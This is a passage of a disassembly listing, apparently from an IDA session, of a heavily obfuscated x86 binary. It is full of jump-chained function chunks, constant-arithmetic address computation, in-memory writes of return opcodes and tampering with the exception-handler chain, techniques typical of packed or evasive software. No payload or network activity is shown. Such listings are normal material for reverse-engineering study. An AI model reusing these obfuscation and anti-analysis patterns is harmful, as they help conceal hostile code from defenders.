		jmp	loc_43D88E
sub_457B90	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D6BF

loc_457BA3:				; CODE XREF: sub_44D6BF+40C3j
		pop	edi
		jmp	loc_448D38
; END OF FUNCTION CHUNK	FOR sub_44D6BF
; ---------------------------------------------------------------------------

loc_457BA9:				; CODE XREF: y2kk37jd:00444D90j
		sub	al, 99h
		mov	edx, [ebp-4]
		imul	byte ptr [edx]
		jmp	loc_452845
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_138. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_457BB6:				; CODE XREF: y2kk37jd:0044D67Dj
		jmp	loc_43FD03
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FFF0

loc_457BBB:				; CODE XREF: sub_445226-59EFj
					; sub_43FFF0+1036j ...
		jmp	sub_454413
; END OF FUNCTION CHUNK	FOR sub_43FFF0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451854

loc_457BC0:				; CODE XREF: sub_451854:loc_45854Aj
		xor	eax, 0C2985450h
		add	eax, ebp
		add	eax, 71E24A56h
		mov	dword ptr [eax], offset	dword_474244
		push	0
		jmp	loc_43F807
; END OF FUNCTION CHUNK	FOR sub_451854
; ---------------------------------------------------------------------------
		test	al, al
		jz	loc_43E6EC
		jmp	loc_45A555
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_446. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_457BE9:				; CODE XREF: y2kk37jd:00442F79j
		jmp	loc_4551D3
; ---------------------------------------------------------------------------
		jb	loc_45BD7E
		jmp	sub_4504BC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45689F

loc_457BF9:				; CODE XREF: sub_45689F-27FEj
		add	ebx, esi

loc_457BFB:				; CODE XREF: sub_45689F:loc_454098j
		add	esi, 515F9AD5h
		sub	esi, 0FCB8BF0Dh
		test	esi, 8000h
		jmp	loc_45A096
; END OF FUNCTION CHUNK	FOR sub_45689F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43DE8B

loc_457C12:				; CODE XREF: sub_43DE8B:loc_455FEAj
					; DATA XREF: sub_447166+6o
		push	esi
		mov	esi, ebx
		xchg	esi, [esp+4+var_4]
		mov	ebx, ecx
		xchg	ebx, [esp+4+var_4]
		mov	esp, ebp
		pop	ebp
		mov	eax, ds:dword_4470E4
		jmp	loc_43B302
; END OF FUNCTION CHUNK	FOR sub_43DE8B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F567

loc_457C2B:				; CODE XREF: sub_43F567+1D008j
		xchg	edx, [ebx]
		js	loc_45964E

loc_457C33:				; CODE XREF: sub_43F567:loc_44C4CFj
		mov	[ebp-2Ch], eax
		mov	dword ptr [ebp-20h], 1
; END OF FUNCTION CHUNK	FOR sub_43F567
; START	OF FUNCTION CHUNK FOR sub_44113A

loc_457C3D:				; CODE XREF: sub_44F2A0+10j
		jo	loc_44D5FC
		jmp	loc_4549D3
; END OF FUNCTION CHUNK	FOR sub_44113A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44AC89

loc_457C48:				; CODE XREF: sub_44AC89-31AAj
		jge	loc_4563C5
; END OF FUNCTION CHUNK	FOR sub_44AC89
; START	OF FUNCTION CHUNK FOR sub_4497E8

loc_457C4E:				; CODE XREF: sub_4497E8+6j
		jmp	loc_444421
; END OF FUNCTION CHUNK	FOR sub_4497E8
; ---------------------------------------------------------------------------

loc_457C53:				; CODE XREF: y2kk37jd:00445111j
		jmp	sub_459A7D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_457C58:				; CODE XREF: sub_445226-F90j
		jmp	loc_454687
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
		mov	edi, [ebx]
		jmp	loc_4563C3

; =============== S U B	R O U T	I N E =======================================



sub_457C64	proc near		; CODE XREF: sub_449C4F-B4C5p
					; y2kk37jd:00457072j

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0044E523 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044EB9E SIZE 00000005 BYTES

		xchg	esi, [esp-4+arg_0]
		pop	esi
		mov	[edx], eax
		xchg	ebx, [esp+0]
		jmp	loc_44E523
sub_457C64	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_457C72:				; CODE XREF: y2kk37jd:004597FBj
		js	loc_442789
		mov	edx, 8A770D45h
		mov	ebp, esi
		xchg	ebp, [edi]

loc_457C81:				; CODE XREF: y2kk37jd:loc_44168Dj
		push	0

loc_457C83:				; CODE XREF: y2kk37jd:loc_4427D5j
		push	edx
		push	0E4DCC2Dh
		jmp	loc_45946C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453B38

loc_457C8E:				; CODE XREF: sub_453B38-DBA6j
		jge	sub_4577FE
		adc	ebp, 0FE9040E6h

loc_457C9A:				; CODE XREF: sub_453B38:loc_44AEADj
		rol	ecx, 18h

loc_457C9D:				; CODE XREF: y2kk37jd:loc_453963j
		add	ecx, 0B9F0FF36h
		mov	[ecx], eax
		pop	ecx
		push	esi
		jmp	loc_450FD0
; END OF FUNCTION CHUNK	FOR sub_453B38
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DE4C

loc_457CAC:				; CODE XREF: sub_44DE4C+7j
		xchg	ebp, [esp+0]
		push	0C948D2C0h
		pop	eax
		xor	eax, 0B8FBD18Bh
		sub	eax, 6C72B16Ch
		add	eax, 0FB04906Dh
		xchg	eax, [esp+0]
		jmp	sub_442C3E
; END OF FUNCTION CHUNK	FOR sub_44DE4C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C851

loc_457CCF:				; CODE XREF: sub_43C851:loc_43D0A0j
		jz	loc_4598E4
		jmp	loc_44AA76
; END OF FUNCTION CHUNK	FOR sub_43C851
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_457CDA:				; CODE XREF: sub_445226+9DAj
		ja	loc_458156

loc_457CE0:				; CODE XREF: sub_445226:loc_451911j
		xor	ebx, 5C1A710Fh
		push	offset sub_43E049
		jmp	loc_445666
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------

loc_457CF0:				; CODE XREF: y2kk37jd:0044725Aj
		jnz	loc_455B90

loc_457CF6:				; CODE XREF: y2kk37jd:004569B3j
		jmp	loc_45123E
; ---------------------------------------------------------------------------

loc_457CFB:				; CODE XREF: y2kk37jd:004529FBj
		jmp	loc_43D713
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442049

loc_457D00:				; CODE XREF: sub_442049+Aj
		jmp	nullsub_468
; END OF FUNCTION CHUNK	FOR sub_442049
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C46D

loc_457D05:				; CODE XREF: sub_43C46D+Cj
		jmp	loc_43C88E
; END OF FUNCTION CHUNK	FOR sub_43C46D
; ---------------------------------------------------------------------------
		test	ebp, ecx
		jmp	loc_44275D
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_422. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447D0B

loc_457D12:				; CODE XREF: sub_447D0B+9j
		mov	ebp, ecx
		pop	ecx
		mov	eax, ds:dword_446BD0
		push	offset loc_44F624
		jmp	locret_44B7EA
; END OF FUNCTION CHUNK	FOR sub_447D0B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D412

loc_457D25:				; CODE XREF: sub_43D412:loc_440815j
		pop	ecx
		xor	ecx, 82989D4Fh
		cmp	ecx, 7A5DF55Ah
		jmp	loc_45C634
; END OF FUNCTION CHUNK	FOR sub_43D412
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440337

loc_457D37:				; CODE XREF: sub_440337+17518j
		test	ecx, 64197416h

loc_457D3D:				; CODE XREF: y2kk37jd:0045B3E7j
		jmp	loc_446C33
; END OF FUNCTION CHUNK	FOR sub_440337
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440040

loc_457D42:				; CODE XREF: sub_440040+796Dj
		jge	loc_454E12
; END OF FUNCTION CHUNK	FOR sub_440040
; START	OF FUNCTION CHUNK FOR sub_440AA5

loc_457D48:				; CODE XREF: sub_440AA5+1A666j
		jmp	loc_44C66C
; END OF FUNCTION CHUNK	FOR sub_440AA5
; ---------------------------------------------------------------------------
		and	edi, eax
		or	ecx, 1A15CB16h
; START	OF FUNCTION CHUNK FOR sub_43B8D6

loc_457D55:				; CODE XREF: sub_43B8D6:loc_43FC0Aj
		jmp	loc_454E10
; END OF FUNCTION CHUNK	FOR sub_43B8D6

; =============== S U B	R O U T	I N E =======================================



sub_457D5A	proc near		; DATA XREF: sub_446303-305Eo

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043DB80 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 004451A0 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0044C260 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 0044D76E SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00450CEA SIZE 00000007 BYTES
; FUNCTION CHUNK AT 004517AE SIZE 0000000F BYTES
; FUNCTION CHUNK AT 004533E2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004534BD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004546B0 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 004548D2 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 0045556C SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00456230 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045C1B5 SIZE 00000005 BYTES

		mov	eax, [eax]
		push	eax
		call	sub_45C4C8
		cmp	dword ptr [ebp-0Ch], 0
		jz	loc_4517AE
		jmp	loc_44D76E
sub_457D5A	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448700

loc_457D71:				; CODE XREF: sub_448700-CFE0j
		pop	edx
		popf
		mov	eax, [ebp-10h]
		cmp	eax, [ebp-18h]
		jb	loc_43CC4C
		jmp	loc_43B019
; END OF FUNCTION CHUNK	FOR sub_448700
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44753E

loc_457D84:				; CODE XREF: sub_44753E+CD7Dj
		jz	loc_43CC4C
		jmp	loc_43EDC6
; END OF FUNCTION CHUNK	FOR sub_44753E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DBF8

loc_457D8F:				; CODE XREF: sub_44DBF8+46C4j
		xchg	esi, [edi]
		mov	eax, edi
		pushf

loc_457D94:				; CODE XREF: sub_44DBF8:loc_45ACF3j
		lea	eax, [ebp-24h]
		push	eax
		push	4
		lea	eax, [ebp-1C8h]
		push	eax
		jmp	loc_44C527
; END OF FUNCTION CHUNK	FOR sub_44DBF8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4448E2

loc_457DA6:				; CODE XREF: sub_4448E2:loc_44D048j
		jnp	loc_4501AF
		cmp	ecx, ebx
; END OF FUNCTION CHUNK	FOR sub_4448E2
; START	OF FUNCTION CHUNK FOR sub_4458DD

loc_457DAE:				; CODE XREF: sub_4458DD:loc_452F6Fj
		jmp	loc_454914
; END OF FUNCTION CHUNK	FOR sub_4458DD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D4CE

loc_457DB3:				; CODE XREF: sub_43D4CE-137Fj
					; sub_43C054:loc_44D3ACj
		ror	edx, 1Bh
		jmp	loc_4520AE
; END OF FUNCTION CHUNK	FOR sub_43D4CE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441AAB

loc_457DBB:				; CODE XREF: sub_441AAB-22D0j
		xor	edx, edi

loc_457DBD:				; CODE XREF: sub_441AAB+145Bj
		add	edi, 8A47E345h
		mov	[edi], eax
		xchg	esi, [esp+0]
		jmp	loc_442F3D
; END OF FUNCTION CHUNK	FOR sub_441AAB
; ---------------------------------------------------------------------------

loc_457DCD:				; CODE XREF: y2kk37jd:00459DC6j
		pop	ecx
		jmp	loc_45944F

; =============== S U B	R O U T	I N E =======================================



sub_457DD3	proc near		; CODE XREF: y2kk37jd:00443ACCj
					; sub_44C01B:loc_45C441p

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 00457740 SIZE 0000000B BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		xchg	ebx, [esp-4+arg_0]

loc_457DDA:				; CODE XREF: sub_442376+D3A7j
		call	sub_452C88

loc_457DDF:				; CODE XREF: sub_457D5A-346Fj
		jmp	loc_457740
sub_457DD3	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45C104

loc_457DE4:				; CODE XREF: sub_45C104-1AEB4j
		jmp	loc_43E84F
; END OF FUNCTION CHUNK	FOR sub_45C104
; ---------------------------------------------------------------------------
		ror	edi, 12h
		adc	eax, esi
		jmp	sub_43B4CB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45618C

loc_457DF3:				; CODE XREF: sub_45618C+15j
		mov	byte ptr [eax],	0C3h
		jmp	loc_444F1F
; END OF FUNCTION CHUNK	FOR sub_45618C
; ---------------------------------------------------------------------------
		call	nullsub_502
		jmp	ds:dword_41E060
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4543EF

loc_457E06:				; CODE XREF: sub_4543EF+Cj
		jmp	nullsub_448
; END OF FUNCTION CHUNK	FOR sub_4543EF
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_502. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
		test	ds:8700002Ch, cl
		or	al, 24h
		jmp	loc_45321B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44107E

loc_457E19:				; CODE XREF: sub_44107E:loc_43E31Bj
		mov	ecx, 4927B48Fh
		xor	edx, edi
		jmp	loc_44682B
; END OF FUNCTION CHUNK	FOR sub_44107E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4477A2

loc_457E25:				; CODE XREF: sub_4477A2:loc_43D1EDj
		jl	loc_449527
; END OF FUNCTION CHUNK	FOR sub_4477A2
; START	OF FUNCTION CHUNK FOR sub_445226

loc_457E2B:				; CODE XREF: sub_445226+114E6j
		jmp	loc_44B8DC
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------

loc_457E30:				; CODE XREF: y2kk37jd:0044B03Aj
		jmp	loc_44BA48
; ---------------------------------------------------------------------------
		and	ecx, 0C6D14B38h
		jmp	loc_449520
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_255. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_457E41:				; CODE XREF: y2kk37jd:00442F91j
		jmp	loc_43B3A4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440B7C

loc_457E46:				; CODE XREF: sub_440B7C-38EEj
		jmp	loc_43FF29
; END OF FUNCTION CHUNK	FOR sub_440B7C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457F67

loc_457E4B:				; CODE XREF: sub_457F67-1C2F3j
		jmp	nullsub_241
; END OF FUNCTION CHUNK	FOR sub_457F67
; ---------------------------------------------------------------------------
		push	eax
		jmp	sub_43D20F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43BD3D

loc_457E56:				; CODE XREF: sub_43BD3D:loc_44FB12j
		jnz	loc_43DFAB
		test	ebp, 69242037h
		jmp	loc_43DF99
; END OF FUNCTION CHUNK	FOR sub_43BD3D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_457E67:				; CODE XREF: sub_445226-983Dj
		cdq
		xchg	edx, ecx
		add	ebx, 9B96DD38h
		jmp	loc_4456B5
; END OF FUNCTION CHUNK	FOR sub_445226
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_198. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448658

loc_457E76:				; CODE XREF: sub_448658:loc_442E73j
		jl	loc_450F8E

loc_457E7C:				; CODE XREF: sub_44B924+8856j
		jmp	loc_442FFD
; END OF FUNCTION CHUNK	FOR sub_448658
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440040

loc_457E81:				; CODE XREF: sub_440040+Cj
		jmp	loc_451AEE
; END OF FUNCTION CHUNK	FOR sub_440040
; ---------------------------------------------------------------------------
		jbe	loc_45584C
		xchg	edx, [eax]
		jmp	loc_450F80
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43DE8B

loc_457E93:				; CODE XREF: sub_43DE8B:loc_43EBA6j
		sub	eax, 3CF0523h
		cdq
		not	edx
		xchg	ebx, [edi]
		jmp	loc_4407CB
; END OF FUNCTION CHUNK	FOR sub_43DE8B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44001E

loc_457EA3:				; CODE XREF: sub_44001E:loc_450195j
		xchg	ecx, [esp+0]
; END OF FUNCTION CHUNK	FOR sub_44001E
; START	OF FUNCTION CHUNK FOR sub_44B508

loc_457EA6:				; CODE XREF: sub_44B508:loc_44C1ADj
		jmp	sub_4581BB
; END OF FUNCTION CHUNK	FOR sub_44B508
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451A35

loc_457EAB:				; CODE XREF: sub_451A35:loc_447D6Aj
		call	sub_440CD1
		retn
; END OF FUNCTION CHUNK	FOR sub_451A35
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456541

loc_457EB1:				; CODE XREF: y2kk37jd:loc_442C8Dj
					; sub_456541+1Cj
		jmp	sub_44F3F5
; END OF FUNCTION CHUNK	FOR sub_456541
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4421DC

loc_457EB6:				; CODE XREF: sub_4421DC+13834j
		jmp	loc_4568FB
; END OF FUNCTION CHUNK	FOR sub_4421DC
; ---------------------------------------------------------------------------
		db 66h
dword_457EBC	dd 0			; DATA XREF: y2kk37jd:loc_43DCC2r
					; y2kk37jd:004476DBr
dword_457EC0	dd 492752D5h, 71A82A4Eh, 0D86364h ; DATA XREF: sub_445226-7573o
					; sub_451A35+5D9Bo
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457042

loc_457ECC:				; CODE XREF: sub_457042+7j
		jmp	loc_454824
; END OF FUNCTION CHUNK	FOR sub_457042
; ---------------------------------------------------------------------------
		jns	loc_4566ED
		mov	edx, ds:dword_446E98
		jmp	loc_44E32C
; ---------------------------------------------------------------------------

locret_457EE2:				; CODE XREF: y2kk37jd:0045258Ej
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45C2D2

loc_457EE3:				; CODE XREF: sub_45C2D2+Aj
		jmp	sub_442C3E
; END OF FUNCTION CHUNK	FOR sub_45C2D2
; ---------------------------------------------------------------------------

loc_457EE8:				; CODE XREF: y2kk37jd:004589B2j
		jmp	loc_443CDF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4447EA

loc_457EED:				; CODE XREF: sub_4447EA+11D3Cj
		jmp	loc_445CB1
; END OF FUNCTION CHUNK	FOR sub_4447EA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B489

loc_457EF2:				; CODE XREF: sub_445226+4Cj
					; y2kk37jd:0044EE72j ...
		pop	large dword ptr	fs:0
		add	esp, 4
		retn
; END OF FUNCTION CHUNK	FOR sub_44B489
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_457EFD:				; CODE XREF: sub_445226+1110Aj
		jmp	loc_44DC8F
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445B38

loc_457F02:				; CODE XREF: sub_445B38+8A7Cj
		jmp	loc_455167
; END OF FUNCTION CHUNK	FOR sub_445B38
; ---------------------------------------------------------------------------

loc_457F07:				; CODE XREF: y2kk37jd:0043DBC7j
		jmp	loc_456AF2

; =============== S U B	R O U T	I N E =======================================



sub_457F0C	proc near		; CODE XREF: sub_45866A:loc_4405BCj
					; y2kk37jd:00443EF0p

; FUNCTION CHUNK AT 00459DD4 SIZE 00000005 BYTES

		push	large dword ptr	fs:0
		push	offset loc_45A4EA
		jmp	loc_459DD4
sub_457F0C	endp

; ---------------------------------------------------------------------------

locret_457F1D:				; CODE XREF: y2kk37jd:00459511j
		retn
; ---------------------------------------------------------------------------

loc_457F1E:				; CODE XREF: y2kk37jd:loc_43D386j
		jmp	loc_4496AC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_457F23:				; CODE XREF: sub_445226:loc_450EE4j
		popf

loc_457F24:				; CODE XREF: y2kk37jd:00450EDCj
		rol	edx, 1Ah
		add	edx, 2E3C0E0Ch
		add	edx, ebp
		add	edx, 4B6D1A67h
		mov	edx, [edx]
		imul	byte ptr [edx]
		cmp	al, 0A4h
		jmp	loc_44009E
; END OF FUNCTION CHUNK	FOR sub_445226

; =============== S U B	R O U T	I N E =======================================



sub_457F40	proc near		; DATA XREF: y2kk37jd:0044E377o

; FUNCTION CHUNK AT 00446637 SIZE 00000005 BYTES

		mov	byte ptr [eax],	0C3h
		jmp	loc_446637
sub_457F40	endp

; ---------------------------------------------------------------------------
		xchg	ecx, [esp]
		mov	edx, ecx
		pop	ecx
		mov	eax, [esp]
		push	edx
		call	sub_449775
		mov	eax, 0B2EE4EE4h
		jmp	loc_453E1E
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_178. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_457F62:				; CODE XREF: y2kk37jd:00443AE8j
		jmp	nullsub_17

; =============== S U B	R O U T	I N E =======================================



sub_457F67	proc near		; CODE XREF: sub_44EB56:loc_451AF9j
					; sub_45705Cj

; FUNCTION CHUNK AT 0043BC61 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00457E4B SIZE 00000005 BYTES

		add	esp, 0FFFFFFF8h
		mov	[ebp-8], edx
		mov	[ebp-4], eax
		mov	edx, [ebp-8]
		mov	eax, [ebp-4]

loc_457F76:				; CODE XREF: y2kk37jd:004414DBj
		jmp	loc_43BC61
sub_457F67	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		mov	eax, edi
		jmp	sub_44803E
; ---------------------------------------------------------------------------

locret_457F82:				; CODE XREF: y2kk37jd:00455422j
		retn
; ---------------------------------------------------------------------------

loc_457F83:				; DATA XREF: sub_45BBF8-16DE9o
		call	sub_43F5BD
		mov	eax, 0CB10B158h
		push	offset sub_442B26
		jmp	loc_43C173
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4502E6

loc_457F97:				; CODE XREF: sub_4502E6+22j
		add	edx, 500734h
		call	sub_4540F2

loc_457FA2:				; CODE XREF: sub_45B491-6D87j
		mov	eax, 3DD52820h
		jmp	loc_44C206
; END OF FUNCTION CHUNK	FOR sub_4502E6

; =============== S U B	R O U T	I N E =======================================



sub_457FAC	proc near		; CODE XREF: sub_40D41A+11Dp
					; sub_43E619:loc_43E622j
					; DATA XREF: ...

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 00458F5F SIZE 00000025 BYTES

		call	sub_43E619

loc_457FB1:				; CODE XREF: sub_443831:loc_43F3DEj
		jno	loc_44537B
		xor	ebp, esi
		jmp	loc_458F5F
sub_457FAC	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458FC0

loc_457FBE:				; CODE XREF: sub_458FC0+9j
		push	eax
		mov	eax, ecx
		xchg	eax, [esp+4+var_4]
		mov	esp, ebp
		pop	ebp
		jmp	loc_458806
; END OF FUNCTION CHUNK	FOR sub_458FC0

; =============== S U B	R O U T	I N E =======================================



sub_457FCC	proc near		; CODE XREF: sub_456809-C0CEj

; FUNCTION CHUNK AT 00443971 SIZE 00000005 BYTES

		push	ebp
		push	offset sub_452B42
		jmp	loc_443971
sub_457FCC	endp

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_160. PRESS KEYPAD	"+" TO EXPAND]
dword_457FD8	dd 0E613CF6Eh		; DATA XREF: sub_43F346+6r

; =============== S U B	R O U T	I N E =======================================



sub_457FDC	proc near		; CODE XREF: sub_4056E7+49p
					; sub_405753+49p ...

; FUNCTION CHUNK AT 0043D2F2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00445999 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00445C9D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00445CEE SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0044CF31 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044D36E SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0044EC53 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 004552CB SIZE 0000000B BYTES

		jno	loc_4552CB
		push	5CA67928h
		jmp	loc_4408C5
sub_457FDC	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45C6ED

loc_457FEC:				; CODE XREF: sub_45C6ED+9j
		mov	esp, ebp
		pop	ebp
		mov	eax, ds:dword_446BC4
		or	eax, eax
		jnz	loc_443F76
		jmp	loc_4406BD
; END OF FUNCTION CHUNK	FOR sub_45C6ED
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443BAF

loc_458002:				; CODE XREF: sub_443BAF+13FA1j
		adc	edx, esi
		mov	edi, 4EEC81BBh
		jo	loc_443870

loc_45800F:				; CODE XREF: sub_443BAF:loc_457B48j
		add	edx, 2120D6BCh
		jmp	loc_44C5D3
; END OF FUNCTION CHUNK	FOR sub_443BAF

; =============== S U B	R O U T	I N E =======================================



sub_45801A	proc near		; CODE XREF: y2kk37jd:0044BB58j
					; sub_448DCA:loc_44D89Bj ...

; FUNCTION CHUNK AT 00454812 SIZE 00000005 BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		cmp	eax, 0FFFFFFFFh
		jz	loc_448A19
		push	offset sub_448A12
		jmp	loc_454812
sub_45801A	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		ror	esi, 19h
		jmp	sub_44723A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CDD5

loc_458039:				; CODE XREF: sub_44CDD5:loc_43F23Bj
		jz	loc_44CD32
		jmp	loc_4572D6
; END OF FUNCTION CHUNK	FOR sub_44CDD5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B508

loc_458044:				; CODE XREF: sub_44B508-BAF2j
		shr	edi, 11h
		jmp	loc_44CB18
; END OF FUNCTION CHUNK	FOR sub_44B508
; ---------------------------------------------------------------------------
		not	edi
		jmp	sub_453F01
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FE06

loc_458053:				; CODE XREF: sub_43FE06+1Bj
		jz	loc_43F7AB
		mov	[ebx], edx
		jmp	loc_43F7A0
; END OF FUNCTION CHUNK	FOR sub_43FE06
; ---------------------------------------------------------------------------

locret_458060:				; CODE XREF: y2kk37jd:0045BA63j
		retn
; ---------------------------------------------------------------------------

loc_458061:				; DATA XREF: sub_445EBA+Ao
		imul	byte ptr [edx]
		call	sub_444000
; START	OF FUNCTION CHUNK FOR sub_4598BE

loc_458068:				; CODE XREF: sub_4598BE-6E3Aj
		call	sub_43BA66
; END OF FUNCTION CHUNK	FOR sub_4598BE
; START	OF FUNCTION CHUNK FOR sub_43C2D9

loc_45806D:				; CODE XREF: sub_43C2D9:loc_44BA94j
		mov	ds:dword_4470AC, eax
		mov	ds:byte_449C3C,	1
		lea	eax, [ebp-14h]
		xor	edx, edx
		jmp	loc_4526BD
; END OF FUNCTION CHUNK	FOR sub_43C2D9
; ---------------------------------------------------------------------------
		push	26ECF9CBh
		pop	edi
		and	edi, ds:4000F3h
		add	edi, 0B31E76Eh
		or	edi, 4614E634h
		add	edi, 0AA2D73F1h
		mov	[edi], eax
		pop	edi
		jmp	locret_44B153
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44310A

loc_4580A9:				; CODE XREF: sub_44310A:loc_4481F4j
		jnz	loc_43E7F5

loc_4580AF:				; CODE XREF: y2kk37jd:0044924Cj
		jmp	loc_447AA1
; END OF FUNCTION CHUNK	FOR sub_44310A
; ---------------------------------------------------------------------------
		push	edi
		jmp	loc_43E7F2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C335

loc_4580BA:				; CODE XREF: sub_43C335:loc_443951j
		jz	loc_442339
		jmp	loc_43EBB3
; END OF FUNCTION CHUNK	FOR sub_43C335

; =============== S U B	R O U T	I N E =======================================



sub_4580C5	proc near		; CODE XREF: sub_445226-3B2Cj
					; DATA XREF: sub_45AC4B:loc_444409o

; FUNCTION CHUNK AT 00459423 SIZE 0000000B BYTES

		mov	eax, ds:dword_4516C8
		or	eax, eax
		jnz	loc_4462F4

loc_4580D3:				; CODE XREF: y2kk37jd:0043DD4Fj
		jmp	loc_459423
sub_4580C5	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4458DD

loc_4580D8:				; CODE XREF: sub_4458DD:loc_45C5F5j
